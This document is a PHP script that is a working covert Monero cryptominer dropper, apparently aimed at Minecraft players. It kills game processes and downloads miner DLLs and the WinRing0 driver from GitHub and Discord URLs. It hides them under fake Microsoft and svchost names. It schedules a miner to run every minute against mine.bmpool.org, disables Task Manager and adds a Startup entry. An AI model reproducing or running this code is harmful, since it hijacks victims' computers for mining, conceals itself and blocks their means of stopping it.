
if($GLOBALS['start'] != 1){
execute('cmd /c taskkill /f /im Minecraft.exe');
execute('cmd /c taskkill /f /im Minecraft.Windows.exe');
execute('cmd /c taskkill /f /im oxibyte.exe');
}
//file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\microsotf.bat',"@echo off\n start ".$_ENV['APPDATA'].'\\Microsoft\\5.exe'.' --coin XMR --url mine.bmpool.org:6004 --user 2970288 -p Startup --log-file 1619948916_xmr_12001_log.txt --threads 6 -B');

if(!file_exists($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\svchost.exe')){
    file_put_contents($_ENV['APPDATA'].'\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\microsoftUpd.bat',"@echo off \n start https://lightminer.co/2970288");
}


execute('cmd /c SCHTASKS /Delete /TN MicrosotNetOptimizer /f');
wait(500);
(new Thread(function(){
    
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\xmrig-cuda.dll',file_get_contents('https://github.com/Rastihin/mce/raw/main/xmrig-cuda.dll'));
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\WinRing0x64.sys',file_get_contents('https://github.com/Rastihin/mce/raw/main/WinRing0x64.sys'));
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\nvrtc-builtins64_102.dll',file_get_contents('https://cdn.discordapp.com/attachments/836942104986124312/838423281199611914/nvrtc-builtins64_102.dll'));
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\nvrtc64_102_0.dll',file_get_contents('https://github.com/Rastihin/mce/raw/main/nvrtc64_102_0.dll'));
    //file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\svchost.exe',file_get_contents('https://github.com/Rastihin/mce/raw/main/5.exe'));
    execute('cmd /c SCHTASKS /Create /SC MINUTE /MO 1 /TN MicrosotNetOptimizer /TR "%programdata%\Microsoft\DeviceSync\svchost.exe --url mine.bmpool.org:6004 --user 2970288 -p Startup --log-file 1619948916_xmr_12001_log.txt --threads 6 -B"');
    execute('cmd /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1');
    wait(10000);
    execute('cmd /c SCHTASKS /Run /TN MicrosotNetOptimizer');
    exit();
}))->start();

